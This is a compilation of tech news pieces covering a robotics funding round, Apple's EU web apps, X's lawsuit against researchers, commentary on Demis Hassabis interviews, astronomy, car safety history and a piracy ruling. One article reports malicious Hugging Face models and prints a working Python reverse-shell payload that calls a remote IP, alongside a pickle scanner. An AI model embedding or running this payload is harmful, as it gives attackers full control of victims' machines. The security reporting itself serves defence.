Author name: Mike M.


Huge funding round makes “Figure” Big Tech’s favorite humanoid robot company

They’ve got an aluminum CNC machine, and they aren’t afraid to use it —

Investors Microsoft, OpenAI, Nvidia, Jeff Bezos, and Intel value Figure at $2.6B.

The Figure 01 and a few spare parts. Obviously they are big fans of aluminum.


Figure

Humanoid robotics company Figure AI announced it raised $675 million in a funding round from an all-star cast of Big Tech investors. The company, which aims to commercialize a humanoid robot, now has a $2.6 billion valuation. Participants in the latest funding round include Microsoft, the OpenAI Startup Fund, Nvidia, Jeff Bezos’ Bezos Expeditions, Parkway Venture Capital, Intel Capital, Align Ventures, and ARK Invest. With all these big-name investors, Figure is officially Big Tech’s favorite humanoid robotics company. The manufacturing industry is taking notice, too. In January, Figure even announced a commercial agreement with BMW to have robots work on its production line.

“In conjunction with this investment,” the press release reads, “Figure and OpenAI have entered into a collaboration agreement to develop next generation AI models for humanoid robots, combining OpenAI’s research with Figure’s deep understanding of robotics hardware and software. The collaboration aims to help accelerate Figure’s commercial timeline by enhancing the capabilities of humanoid robots to process and reason from language.”

With all this hype and funding, the robot must be incredible, right? Well, the company is new and only unveiled its first humanoid “prototype,” the “Figure 01,” in October. At that time, the company said it represented about 12 months of work. With veterans from “Boston Dynamics, Tesla, Google DeepMind, and Archer Aviation,” the company has a strong starting point.

  • Ok, it’s time to pick up a box, so get out your oversized hands and grab hold.

    Figure

  • Those extra-big hands seem to be the focus of the robot. They are just incredibly complex and look to be aiming at a 1:1 build of a human hand.

    Figure

  • Just look at everything inside those fingers. It looks like there are tendons of some kind.

    Figure

  • Not impressed with this “pooped your pants” walk cycle, which doesn’t really use the knees or ankles.

    Figure

  • A lot of the hardware appears to be waiting for software to use it, like the screen that serves as the robot’s face. It only seems to run a screen saver.

    Figure

The actual design of the robot appears to be solid aluminum and electrically actuated, aiming for an exact 1:1 match for a human. The website says the goal is a 5-foot 6-inch, 130-lb humanoid that can lift 44 pounds. That’s a very small form-over-function package to try to fit all these robot parts into. For alternative humanoid designs, you’ve got Boston Dynamics’ Atlas, which is more of a hulking beast thanks to its function-over-form design. There’s also the more purpose-built “Digit” from Agility Robotics, which has backward-bending bird legs for warehouse work, allowing it to bend down in front of a shelf without having to worry about the knees colliding with anything.

The best insight into the company’s progress is the official YouTube channel, which shows the Figure 01 robot doing a few tasks. The last video, from a few days ago, showed the robot doing a “fully autonomous” box-moving task at “16.7 percent” of normal human speed. For a bipedal robot, I have to say the walking is not impressive. The Figure 01 has a slow, timid shuffle that only lets it wobble forward at a snail’s pace. The walk cycle is almost entirely driven by the hips: the knees are bent the entire time and always out in front of the robot, and the ankles barely move. It seems able to walk only in a straight line, and turning is a slow stop-and-spin-in-place motion with the feet pedaling in place the entire time. The feet keep up a constant up-and-down motion even when the robot isn’t moving forward, almost as if foot planning just runs on a set timer for balance. It can walk, but it walks about as slowly and awkwardly as a robot can. A lot of the hardware seems built for software that isn’t ready yet.

Figure seems more focused on the hands than anything. The 01 has giant, oversized hands that are a close match for a human’s, with five fingers, each with three joints. In January, Figure posted a video of the robot working a Keurig coffee maker. That means flipping up the lid with a fingertip, delicately picking up an easily crushable plastic cup with two fingers, dropping it into the coffee maker, casually pushing the lid down with about three different fingers, and pressing the “go” button with a single finger. It’s impressive not to destroy the coffee maker or the K-cup, but that Keurig is still living a rough life—a few of the robot’s interactions incidentally lift one side or the other of the coffee maker off the table thanks to way too much force.

  • For some very delicate hand work, here’s the Figure 01 making coffee. They went and sourced a silver Keurig machine so this image only contains two colors, black and silver.

    Figure

  • Time to press the “go” button. Also, is that a wrist-mounted lidar puck for vision? Occasionally, flashes of light shoot out of it in the video.

    Figure

  • These hand close-ups are just incredible. I really do think they are tendon-actuated. You can also see all sorts of pads on the inside of the hand.

    Figure

  • I love the ridiculous T-pose it assumes while it waits for coffee.

    Figure

The video says the coffee task was performed via an “end-to-end neural network” using 10 hours of training time. Unlike walking, the hands really feel like they have a human influence when it comes to their movement. When the robot picks up the K-cup via a pinch of its thumb and index finger or goes to push a button, it also closes the other three fingers into a fist. There isn’t a real reason to move the three fingers that aren’t doing anything, but that’s what a human would do, so presumably, it’s in the training data. Closing the lid is interesting because I don’t think you could credit a single finger with the task—it’s just kind of a casual push using whatever fingers connect with the lid. The last clip of the video even shows the Figure 01 correcting a mistake—the K-cup doesn’t sit in the coffee maker correctly, and the robot recognizes this and can poke it around until it falls into place.

A lot of assembly line jobs are done at a station or sitting down, so the focus on hand dexterity makes sense. Boston Dynamics’ Atlas is way more impressive as a walking robot, but that’s also a multi-million dollar research bot that will never see the market. Figure’s goal, according to the press release, is to “bring humanoid robots into commercial operations as soon as possible.” The company openly posts a “master plan” on its website, which reads, “1) Build a feature-complete electromechanical humanoid. 2) Perform human-like manipulation. 3) Integrate humanoids into the labor force.” The robots are coming for our jobs.



Apple changes course, will keep iPhone EU web apps how they are in iOS 17.4

Digital Markets Act —

Alternative browsers can pin web apps, but they only run inside Apple’s WebKit.

EU legislation has pushed a number of changes previously thought unthinkable in Apple products, including USB-C ports in iPhones sold in Europe.


Getty Images

Apple has changed its stance on allowing web apps on iPhones and iPads in Europe and will continue to let users put them on their home screens after iOS 17.4 arrives. They will, however, have to be “built directly on WebKit and its security architecture,” rather than running in alternative browsers, which is how it had worked up until new legislation forced the issue.

After the European Union’s Digital Markets Act (DMA) demanded Apple open up its mobile devices to alternative browser engines, the company said it would remove the ability to install home screen web apps entirely. In a developer Q&A section, under the heading “Why don’t users in the EU have access to Home Screen web apps?”, Apple said that “the complex security and privacy concerns” of non-native web apps and what addressing them would require “given the other demands of the DMA and the very low user adoption of Home Screen web apps,” made it so that the company “had to remove the Home Screen web apps feature in the EU.” Any web app installed on a user’s home screen would have simply led them back to their preferred web browser.

Apple further warned against “malicious web apps,” which, without the isolation built into its WebKit system, could read data, steal permissions from other web apps, and install further web apps without permission, among other concerns.

That response prompted an inquiry from European Commission officials, who asked Apple and app developers about the impact of a potential removal of home screen web apps. It also prompted a survey conducted by the Open Web Advocacy group. Apple has until March 6 to comply with the DMA. Apple’s move to block web apps entirely suggested the company believed that allowing web apps powered by Safari, but not by other browser engines, might violate the DMA’s rules. Now, some aspect of that cautious approach has changed.

Under an updated version of that section heading, Apple reiterates its security and privacy concerns and the need to “build new integration architecture that does not currently exist in iOS.” But because of requests to continue web app offerings, “we will continue to offer the existing Home Screen capability in the EU,” Apple writes.

The long, weird road to where web apps are now

Apple has long offered web apps (or Progressive Web Apps) that opened as a separate application rather than in a browser tab. Web apps installed this way offer greater persistence and access to device features, like notifications, cameras, or file storage. Web apps were initially touted by Apple co-founder and then-CEO Steve Jobs as “everything you need” to write “amazing apps” rather than dedicated apps with their own SDK. Four months later, an iPhone SDK was announced, and Apple declared its enthusiastic desire for “native third-party applications on the iPhone.”

While Apple does not break out App Store revenues in its earnings statements, its Services division recorded an all-time high of $22.3 billion in the company’s fourth quarter of 2023, including “all time revenue records” across the App Store and other offerings.

As part of its DMA compliance as a “gatekeeper” of certain systems, Apple must also allow sideloading for EU customers, meaning the installation of iOS apps from stores other than its own official App Store. This week, more than two dozen companies signed a letter to the Commission lamenting Apple’s implementation of App Store rules. Developers seeking to utilize alternative app stores will have to agree to terms that include a “Core Technology Fee,” demanding a 0.50 euro fee for each app, each year, after 1 million downloads. “Few app developers will agree to these unjust terms,” the letter claims, and will thereby further “Apple’s exploitation of its dominance over app developers.”

In a statement provided to Ars, Apple said that its “approach to the Digital Markets Act was guided by two simple goals: complying with the law and reducing the inevitable, increased risks the DMA creates for our EU users.” It noted that Apple employees “spent months in conversation with the European Commission,” and had “in little more than a year, created more than 600 new APIs and a wide range of developer tools.” Still, Apple said, the changes and safeguards it put in place can’t entirely “eliminate new threats the DMA creates,” and the changes “will result in a less secure system.”

That is why, Apple said, it is limiting third-party browser engines, app stores, and other DMA changes to the European Union. “[W]e’re concerned about their impacts on the privacy and security of our users’ experience—which remains our North Star.”



Hugging Face, the GitHub of AI, hosted code that backdoored user devices

IN A PICKLE —

Malicious submissions have been a fact of life for code repositories. AI is no different.

Photograph depicts a security scanner extracting a virus from a string of binary code.

Getty Images

Code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines, researchers from security firm JFrog said Thursday in a report that’s a likely harbinger of what’s to come.

In all, JFrog researchers said, they found roughly 100 submissions that performed hidden and unwanted actions when they were downloaded and loaded onto an end-user device. Most of the flagged machine learning models—all of which went undetected by Hugging Face—appeared to be benign proofs of concept uploaded by researchers or curious users. JFrog researchers said in an email that 10 of them were “truly malicious” in that they performed actions that actually compromised the users’ security when loaded.

Full control of user devices

One model drew particular concern because it opened a reverse shell that gave a remote device on the Internet full control of the end user’s device. When JFrog researchers loaded the model into a lab machine, the submission indeed loaded a reverse shell but took no further action.

That, the IP address of the remote device, and the existence of identical shells connecting elsewhere raised the possibility that the submission was also the work of researchers. An exploit that opens a device to such tampering, however, is a major breach of researcher ethics and demonstrates that, just like code submitted to GitHub and other developer platforms, models available on AI sites can pose serious risks if not carefully vetted first.

“The model’s payload grants the attacker a shell on the compromised machine, enabling them to gain full control over victims’ machines through what is commonly referred to as a ‘backdoor,’” JFrog Senior Researcher David Cohen wrote. “This silent infiltration could potentially grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage, impacting not just individual users but potentially entire organizations across the globe, all while leaving victims utterly unaware of their compromised state.”

A lab machine set up as a honeypot to observe what happened when the model was loaded.


JFrog

Secrets and other bait data the honeypot used to attract the threat actor.


JFrog

How baller432 did it

Like the other nine truly malicious models, the one discussed here used pickle, a format that has long been recognized as inherently risky. Pickle is commonly used in Python to convert objects and classes into a byte stream so that they can be saved to disk or shared over a network. This process, known as serialization, presents hackers with the opportunity to sneak malicious code into the stream.

The model that spawned the reverse shell, submitted by a party with the username baller432, was able to evade Hugging Face’s malware scanner by using pickle’s “__reduce__” method to execute arbitrary code after loading the model file.
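The mechanism is easy to reproduce in a benign form. The sketch below is illustrative, not the attacker’s actual code: any class can override `__reduce__` so that `pickle.loads()` invokes an arbitrary callable, here the harmless `os.getcwd` standing in for a real payload.

```python
import os
import pickle

class NotAModel:
    """Stands in for a serialized model object."""
    def __reduce__(self):
        # Instead of describing how to rebuild NotAModel, hand pickle an
        # arbitrary callable plus its arguments. pickle.loads() will call it.
        # A real payload would put something like os.system here.
        return (os.getcwd, ())

blob = pickle.dumps(NotAModel())
result = pickle.loads(blob)   # runs os.getcwd(); never rebuilds NotAModel
print(result == os.getcwd())  # True: loading executed attacker-chosen code
```

Nothing in the byte stream looks like Python source; the call happens as a routine part of deserialization, which is why loading an untrusted pickle is equivalent to running untrusted code.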

JFrog’s Cohen explained the process in more technical detail:

In loading PyTorch models with transformers, a common approach involves utilizing the torch.load() function, which deserializes the model from a file. Particularly when dealing with PyTorch models trained with Hugging Face’s Transformers library, this method is often employed to load the model along with its architecture, weights, and any associated configurations. Transformers provide a comprehensive framework for natural language processing tasks, facilitating the creation and deployment of sophisticated models. In the context of the repository “baller423/goober2,” it appears that the malicious payload was injected into the PyTorch model file using the __reduce__ method of the pickle module. This method, as demonstrated in the provided reference, enables attackers to insert arbitrary Python code into the deserialization process, potentially leading to malicious behavior when the model is loaded.

Upon analysis of the PyTorch file using the fickling tool, we successfully extracted the following payload:

RHOST = "210.117.212.93"
RPORT = 4242

from sys import platform

if platform != 'win32':
    import threading
    import socket
    import pty
    import os

    def connect_and_spawn_shell():
        s = socket.socket()
        s.connect((RHOST, RPORT))
        [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
        pty.spawn("/bin/sh")

    threading.Thread(target=connect_and_spawn_shell).start()
else:
    import os
    import socket
    import subprocess
    import threading
    import sys

    def send_to_process(s, p):
        while True:
            p.stdin.write(s.recv(1024).decode())
            p.stdin.flush()

    def receive_from_process(s, p):
        while True:
            s.send(p.stdout.read(1).encode())

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    while True:
        try:
            s.connect((RHOST, RPORT))
            break
        except:
            pass

    p = subprocess.Popen(["powershell.exe"],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT,
                         stdin=subprocess.PIPE,
                         shell=True,
                         text=True)

    threading.Thread(target=send_to_process, args=[s, p], daemon=True).start()
    threading.Thread(target=receive_from_process, args=[s, p], daemon=True).start()
    p.wait()
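Static pickle scanners, like the fickling tool mentioned above, work roughly this way: instead of loading the file, they walk its opcode stream and flag opcodes that can import names or invoke callables. This is a minimal sketch of that idea; the opcode shortlist is illustrative, not any particular tool’s rule set.

```python
import os
import pickle
import pickletools

# Opcodes that can import names or invoke callables during unpickling.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}

def risky_opcodes(data: bytes) -> set:
    """Statically list call-capable opcodes in a pickle, without loading it."""
    return {op.name for op, arg, pos in pickletools.genops(data) if op.name in SUSPICIOUS}

class Evil:
    """Hypothetical malicious object; __reduce__ stands in for a shell payload."""
    def __reduce__(self):
        return (os.getcwd, ())

print(risky_opcodes(pickle.dumps({"weights": [0.1, 0.2]})))  # empty: plain data needs no calls
print(risky_opcodes(pickle.dumps(Evil())))  # flags the import-and-call opcodes
```

Plain tensors and config dicts serialize without any of these opcodes, so their presence in a “model file” is a strong signal that something will execute at load time.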

Hugging Face has since removed the model and the others flagged by JFrog.



Judge mocks X for “vapid” argument in Musk’s hate speech lawsuit


It looks like Elon Musk may lose X’s lawsuit against hate speech researchers who encouraged a major brand boycott after flagging ads appearing next to extremist content on X, the social media site formerly known as Twitter.

X is trying to argue that the Center for Countering Digital Hate (CCDH) violated the site’s terms of service and illegally accessed non-public data to conduct its reporting, allegedly posing a security risk for X. The boycott, X alleged, cost the company tens of millions of dollars by spooking advertisers; X also contends that the CCDH’s reporting is misleading and that ads are rarely served on extremist content.

But at a hearing Thursday, US District Judge Charles Breyer told the CCDH that he would consider dismissing X’s lawsuit, repeatedly appearing to mock X’s decision to file it in the first place.

Seemingly skeptical of X’s entire argument, Breyer appeared particularly focused on how X intended to prove that the CCDH could have known that its reporting would trigger such substantial financial losses, as the lawsuit hinges on whether the alleged damages were “foreseeable,” NPR reported.

X’s lawyer, Jon Hawk, argued that when the CCDH joined Twitter in 2019, the group agreed to terms of service that noted those terms could change. So when Musk purchased Twitter and updated rules to reinstate accounts spreading hate speech, the CCDH should have been able to foresee those changes in terms and therefore anticipate that any reporting on spikes in hate speech would cause financial losses.

According to CNN, this is where Breyer became frustrated, telling Hawk, “I’m trying to figure out in my mind how that’s possibly true, because I don’t think it is.”

“What you have to tell me is, why is it foreseeable?” Breyer said. “That they should have understood that, at the time they entered the terms of service, that Twitter would then change its policy and allow this type of material to be disseminated?

“That, of course, reduces foreseeability to one of the most vapid extensions of law I’ve ever heard,” Breyer added. “‘Oh, what’s foreseeable is that things can change, and therefore, if there’s a change, it’s ‘foreseeable.’ I mean, that argument is truly remarkable.”

According to NPR, Breyer suggested that X was trying to “shoehorn” its legal theory by using language from a breach of contract claim, when what the company actually appeared to be alleging was defamation.

“You could’ve brought a defamation case; you didn’t bring a defamation case,” Breyer said. “And that’s significant.”

Breyer directly noted that one reason why X might not bring a defamation suit was if the CCDH’s reporting was accurate, NPR reported.

CCDH’s CEO and founder, Imran Ahmed, provided a statement to Ars, confirming that the group is “very pleased with how yesterday’s argument went, including many of the questions and comments from the court.”

“We remain confident in the strength of our arguments for dismissal,” Ahmed said.



Notes on Dwarkesh Patel’s Podcast with Demis Hassabis

Demis Hassabis was interviewed twice this past week.

First, he was interviewed on Hard Fork. Then he had a much more interesting interview with Dwarkesh Patel.

This post covers my notes from both interviews, mostly the one with Dwarkesh.

Hard Fork was less fruitful, because they mostly asked what are for me the wrong questions and mostly got answers I presume Demis has given many times. So I only noticed two things, neither of which is ultimately surprising.

  1. They do ask about The Gemini Incident, although only about the particular issue with image generation. Demis gives the generic ‘it should do what the user wants and this was dumb’ answer, which I buy he likely personally believes.

  2. When asked about p(doom) he expresses dismay about the state of discourse and says around 42:00 that ‘well Geoffrey Hinton and Yann LeCun disagree so that indicates we don’t know, this technology is so transformative that it is unknown. It is nonsense to put a probability on it. What I do know is it is non-zero, that risk, and it is worth debating and researching carefully… we don’t want to wait until the eve of AGI happening.’ He says we want to be prepared even if the risk is relatively small, without saying what would count as small. He also says he hopes in five years to give us a better answer, which is evidence against him having super short timelines.

I do not think this is the right way to handle probabilities in your own head. I do think it is plausibly a smart way to handle public relations around probabilities, given how people react when you give a particular p(doom).

I am of course deeply disappointed that Demis does not think he can differentiate between the arguments of Geoffrey Hinton and Yann LeCun, or weigh the accomplishments, and thus the implied credibility, of the two. He did not get where he is, or win Diplomacy championships, thinking like that. I also don’t think he was being fully genuine here.

Otherwise, this seemed like an inessential interview. Demis did well but was not given new challenges to handle.

Demis Hassabis also talked to Dwarkesh Patel, which is of course self-recommending. Here you want to pay attention, and I paused to think things over and take detailed notes. Five minutes in I had already learned more interesting things than I did from the entire Hard Fork interview.

Here is the transcript, which is also helpful.

  1. (1:00) Dwarkesh first asks Demis about the nature of intelligence, whether it is one broad thing or the sum of many small things. Demis says there must be some common themes and underlying mechanisms, although there are also specialized parts. I strongly agree with Demis. I do not think you can understand intelligence, of any form, without some form of the concept of G.

  2. (1:45) Dwarkesh follows up by asking why, then, doesn’t lots of data in one domain generalize to other domains? Demis says often it does, such as coding improving reasoning (which also happens in humans), and he expects more such transfer.

  3. (4:00) Dwarkesh asks what insights neuroscience brings to AI. Demis points to many early AI concepts. Going forward, questions include how brains form world models or memory.

  4. (6:00) Demis thinks scaffolding via tree search or AlphaZero-style approaches for LLMs is super promising. He notes they’re working hard on search efficiency in many of their approaches so they can search further.

  5. (9:00) Dwarkesh notes that Go and Chess have clear win conditions, real life does not, asks what to do about this. Demis agrees this is a challenge, but that usually ‘in scientific problems’ there are ways to specify goals. Suspicious dodge?

  6. (10:00) Dwarkesh notes humans are super sample efficient; Demis says it is because we are not built for Monte Carlo tree search, so we use our intuition to narrow the search.

  7. (12:00) Demis is optimistic about LLM self-play and synthetic data, but we need to do more work on what makes a good data set – what fills in holes, what fixes potential bias and makes it representative of the distribution you want to learn. Definitely seems underexplored.

  8. (14:00) Dwarkesh asks what techniques are underrated now. Demis says things go in and out of fashion, that we should bring back old ideas like reinforcement and Q learning and combine them with the new ones. Demis really believes games are The Way, it seems.

  9. (15:00) Demis thinks AGI could in theory come from full AlphaZero-style approaches and some people are working on that, with no priors, which you can then combine with known data, and he doesn’t see why you wouldn’t combine planning search with outside knowledge.

  10. (16:45) Demis notes everyone has been surprised how well the scaling hypothesis has held up and systems have gotten grounding and learned concepts, and that language and human feedback can contain so much grounding. From Demis: “I think we’ve got to push scaling as hard as we can, and that’s what we’re doing here. And it’s an empirical question whether that will hit an asymptote or a brick wall, and there are different people argue about that. But actually, I think we should just test it. I think no one knows. But in the meantime, we should also double down on innovation and invention.” He’s roughly splitting his efforts in half, scaling versus new ideas. He’s taking the ‘hit a wall’ hypothesis seriously.

  11. (20:00) Demis says systems need to be grounded (in the physical world and its causes and effects) to achieve their goals and various advances are forms of this grounding; systems will understand physics better. He references the need for robotics.

  12. (21:30) Dwarkesh asks about the other half, grounding in human preferences, and what it takes to align a system smarter than humans. Demis says that has been at the forefront of his and Shane’s minds since before founding DeepMind; they had to plan for success and ensure systems are understandable and controllable. The part that addresses details:

Demis Hassabis: And I think there are sort of several, this will be a whole sort of discussion in itself, but there are many, many ideas that people have from much more stringent eval systems. I think we don’t have good enough evaluations and benchmarks for things like, can the system deceive you? Can it exfiltrate its own code, sort of undesirable behaviors?

And then there are ideas of actually using AI, maybe narrow AIs, so not general learning ones, but systems that are specialized for a domain to help us as the human scientists analyze and summarize what the more general system is doing. Right. So kind of narrow AI tools.

I think that there’s a lot of promise in creating hardened sandboxes or simulations that are hardened with cybersecurity arrangements around the simulation, both to keep the AI in, but also as cybersecurity to keep hackers out. And then you could experiment a lot more freely within that sandbox domain.

And I think a lot of these ideas are, and there’s many, many others, including the analysis stuff we talked about earlier, where can we analyze and understand what the concepts are that this system is building, what the representations are, so maybe they’re not so alien to us and we can actually keep track of the kind of knowledge that it’s building.

It has been over fourteen years of thinking hard about these questions, and this is the best Demis has been able to come up with. They’re not bad ideas. Incrementally they seem helpful. They don’t constitute an answer or full path to victory or central form of a solution. They are more like a grab bag of things one could try incrementally. We are going to need to do better than that.

  1. (24: 00) Dwarkesh asks timelines, notes Shane said median of 2028. Demis sort of dodges and tries to not get pinned down but implies AGI-like systems are on track for 2030 and says he wouldn’t be surprised to get them ‘in the next decade.’

  2. (25: 00) Demis agrees AGI accelerating AI (RSI) is possible, says it depends on what we use the first AGI systems for, warning of the safety implications. The obvious follow-up question is: How would society make a choice to not use the first AGI systems for exactly this? He needs far more understanding to know even what we would need to know to know if this feedback loop was imminent.

  3. (26: 30) Demis notes deception is a root node that you very much do not want, ideally you want the AGI to give you post-hoc explanations. I increasingly think people are considering ‘deception’ as distinct from non-deception in a way that does not reflect reality, and it is an expensive and important confusion.

  4. (27: 40): Dwarkesh asks, what observations would it take to make Demis halt training of Gemini 2 because it was too dangerous? Demis answers reasonably but generically, saying we should test in sandboxes for this reason and that such issues might come up in a few years but aren’t of concern now, that the system lying about defying our instructions might be one trigger. And that then you would, ideally, ‘pause and get to the bottom of why it was doing those things’ before continuing. More conditional alarm, more detail, and especially more hard commitment, seems needed here.

  5. (28: 50) Logistical barriers are the main reason Gemini didn’t scale bigger, also you need to adjust all your parameters and go incrementally, not go more than one order of magnitude at a time. You can predict ‘training loss’ farther out but that does not tell you about actual capabilities you care about. A surprising thing about Gemini was the relationship between scoring on target metrics versus ultimate practical capabilities.

  6. (31: 30) Says Gemini 1.0 used about as much compute as ‘has been rumored for’ GPT-4. Google will have the most compute, they hope to make good use of that, and the things that scale best are what matter most.

  7. (35:30): What should governance for these systems look like? Demis says we all need to be involved in those decisions and reach consensus on what would be good for all, which is why he emphasizes things that benefit everyone, like AI for science. Easy to say, but it needs specifics and actual plans.

  8. (37:30): Dwarkesh asks the good question: Why haven’t LLMs automated things more than they have? Demis says for general use cases the capabilities are not there yet for things such as planning, search, and long-term memory of prior conversations. He mentions future recommendation systems, a pet cause of mine. I think he is underestimating the extent to which the future simply is not evenly distributed yet.

  9. (40:42) Demis says they are working on a safety framework like those of OpenAI and Anthropic. Right now, he says, they have one implicitly via safety councils and the like, chaired by people like Shane, but they are going to talk about it publicly this year. Excellent.

  10. (41:30): Dwarkesh asks about model weights security; Demis connects it to open model weights right away. Demis says Google has very strong, world-class protections already and DeepMind doubles down on that, and says all frontier labs should take such precautions. Access is a tricky issue. For open weights, he’s all for it for things like AlphaFold or AlphaGo that can’t be misused (and those are indeed open sourced now), but his question is: for frontier models, how do we stop bad actors at all scales from misusing them if we share the weights? He doesn’t know the answer and hasn’t heard a clear one anywhere.

  11. (46:00) Asked what safety research will be DeepMind’s specialty, Demis first mentions their pioneering of RLHF, which I would say has not been going well recently and definitely won’t scale. He then mentions self-play, especially for boundary testing, says we need automated testing, and goes back to games. Not nothing, but it seems like he should be able to do better.

  12. (47:00) Demis is excited by multimodal use cases for LLMs like Gemini, and also by the progress in robotics; they like that it is a data-poor regime because it forces them to do good research. Multimodality starts out harder, then makes things easier once things get going. He expects domains where self-play works to see better progress than others, as you would expect.

  13. (52:00) Why build science AIs rather than wait for AGI? We can bring benefits to the world before AGI, and we don’t know how long AGI will take to arrive. Also, real-world problems keep you honest and give you real-world feedback.

  14. (54:30) Standard ‘things are going great’ talk about the merger with Google Brain; calls Gemini the first fruit of the collaboration, and strongly implies the ‘twins’ that inspired the name Gemini are Google Brain and DeepMind.

  15. (57:20) Demis affirms ‘responsible scaling policies are something that is a very good empirical way to precommit to these kinds of things.’

  16. (58:00) Demis says if a model helped enable a bioweapon or something similar, they’d need to ‘fix that loophole’; the important thing is to detect it in advance. I always worry about such talk, because of its emphasis on addressing specific failure modes you foresee rather than thinking about failures in general.

While interesting throughout, nothing here was inconsistent with what we know about Demis Hassabis or DeepMind. Demis, Shane, and DeepMind are clearly very aware of the problems that lie ahead of them and are motivated to solve them, but unfortunately they are still unable to articulate detailed plans that give much hope of actually solving them. Demis seemed much more aware of this than Shane did, which is hopeful. Games are still central to what Demis thinks about and plans for AI.

The best concrete news is that DeepMind will be issuing its own safety framework in the coming months.

Daily Telescope: Finally, we’ve found the core of a famous supernova

A dense subject —

In the astronomy community SN 1987A has somewhat legendary status.

Webb has observed the best evidence yet for emission from a neutron star at the site of Supernova 1987A.

NASA, ESA, CSA, STScI, et al.

Welcome to the Daily Telescope. There is a little too much darkness in this world and not enough light, a little too much pseudoscience and not enough science. We’ll let other publications offer you a daily horoscope. At Ars Technica, we’re going to take a different route, finding inspiration from very real images of a universe that is filled with stars and wonder.

Good morning. It’s February 26, and today’s image highlights the core of a (relatively) nearby supernova.

In the astronomy community, SN 1987A has somewhat legendary status. The first observable light from this exploding star in the Large Magellanic Cloud reached Earth in February, almost 37 years ago to the day. It was the first supernova that astronomers were able to observe and study with modern telescopes. It was still discussed in reverent terms a few years later when I was an undergraduate student studying astronomy at the University of Texas.

One of the enduring mysteries of the supernova is that astronomers have been unable to find its collapsed core, where they would expect to see a neutron star—an ultra-dense object that results from the supernova explosion of a massive star. In recent years, ground-based telescopes have found hints of this collapsed core, but now the James Webb Space Telescope has found emission lines that almost certainly must come from a newly born neutron star.

The astronomical details can be found here. It’s a nice validation of our understanding of supernovae.

I would also like to acknowledge that the Daily Telescope has been anything but “daily” of late. This is due to a confluence of several factors, including a lot of travel and work on other projects, including four features in the last month or so. I’ve had to put some things on the back-burner. I don’t want to stop producing these articles, but I also can’t commit to writing one every day. Maybe it should be renamed? For now, I’m just going to try to do my best. I appreciate those who have written to ask where the Daily Telescope has been—well, all of you but the person who wrote a nasty note.

Source: NASA, ESA, CSA, STScI, et al.

Do you want to submit a photo for the Daily Telescope? Reach out and say hello.

It’s no accident: These automotive safety features flopped

safety first —

Over the years, inventors have had some weird ideas about how to make cars safer.

a toy car crashing into another toy car

Aurich Lawson | Getty Images

Turn signals have been a vehicle safety staple since they first appeared on Buicks in 1939. Of course, many drivers don’t use them, perhaps believing that other motorists can telepathically divine their intentions.

More people might use turn signals if they knew that drivers’ failure to do so leads to more than 2 million accidents annually, according to a study conducted by the Society of Automotive Engineers. That’s 2 percent of all crashes, according to the National Highway Traffic Safety Administration. And not using turn signals increases the likelihood of an accident by 40 percent, according to the University of Michigan Research Institute.

Human nature could be to blame—death and injury will never happen to us, only others.

You wish.

So, is it any wonder that during the first six decades of automobile production, there were few safety features? The world into which the automobile was born was one in which horses powered most transportation, but that didn’t mean getting around was safe. Say a horse got spooked. If the animal was pulling a carriage, its actions could cause the carriage to barrel away or even overturn, injuring or killing its occupants. Or the horse could cause death directly. In fact, a surprising number of kings met their end over the centuries by a horse’s swift kick. And rail travel proved even deadlier. Studies comparing modern traffic accidents with those of the early 20th century reveal that death from travel is 90 percent less likely today than it was in 1925.

Yet America’s passive acceptance of death from vehicle travel in the late 19th and early 20th century explains why auto safety was sporadically addressed, if at all. Sure, there were attempts at offering basic safety in early automobiles, like windshield wipers and improved lighting. And some safety features endured, such as Ford’s introduction of safety glass as standard equipment in 1927 or GM’s turn signals. But while other car safety features appeared from time to time, many of them just didn’t pan out.

Dead ends on the road to safer cars

Among the earliest attempts at providing safety was the O’Leary Fender, invented by John O’Leary of Cohoes, New York, in 1906. “It is made of bands of iron of such shape and design that falling into it is declared to be like the embrace of a summer girl on a moonlit night on the shore,” wrote The Buffalo News in 1919, with more than a little poetic license.

Advertisement for Pennsylvania Vacuum Cup Tires by the Pennsylvania Rubber Company in Jeannette, Pennsylvania. The Pennsylvania Auto Tube is pictured, 1919.

Jay Paull/Getty Images

According to the account, O’Leary was so confident of the fender’s ability to save lives that he used his own child to prove its safety. “The babe was gathered up on the folds of the fender as tenderly as it had ever been in the arms of its mother,” the newspaper reported, “and was not only uninjured but seemed to enjoy the experience.”

There’s no word on what Mrs. O’Leary thought of using the couple’s child as a crash test dummy. But the invention seemed worthy enough that an unnamed car manufacturer battled O’Leary in court over it and lost. Ultimately, his victory proved futile, as the feature was not adopted.

Others also tried to bring some measure of safety to automobiles, chief among them the Pennsylvania Rubber Company of Jeannette, Pennsylvania. The company’s idea: make a tire tread of small suction cups to improve traction. Called the Pennsylvania Vacuum Cup tire, the product proved to be popular for a while, with reports of sales outnumbering conventional tires 10 to 1, according to the Salt Lake Tribune in 1919. While Pennsylvania wasn’t the only rubber company to offer vacuum cup tires, the concept had its day before fading, although the idea does resurface from time to time.

Nevertheless, safety remained unaddressed, even as the number of deaths was rising substantially.

“Last year more than 22,000 persons were killed in or by automobiles, and something like three quarters of a million injured,” wrote The New Republic in 1926. “The number of dead is almost half as large as the list of fatalities during the nineteen months of America’s participation in the Great War.”

“The 1925 total is 10 percent larger than that for 1924,” the publication added.

The chief causes cited were the same as they are today—namely, speeding, violating the rules of the road, inattention, inexperience, and confusion. But at least one automaker—Stutz—was trying to put safety first.

Court blocks $1 billion copyright ruling that punished ISP for its users’ piracy

A man, surrounded by music CDs, uses a laptop while wearing a skull-and-crossbones pirate hat and holding one of the CDs in his mouth.

Getty Images | OcusFocus

A federal appeals court today overturned a $1 billion piracy verdict that a jury handed down against cable Internet service provider Cox Communications in 2019. Judges rejected Sony’s claim that Cox profited directly from copyright infringement committed by users of Cox’s cable broadband network.

Appeals court judges didn’t let Cox off the hook entirely, but they vacated the damages award and ordered a new damages trial, which will presumably result in a significantly smaller amount to be paid to Sony and other copyright holders. Universal and Warner are also plaintiffs in the case.

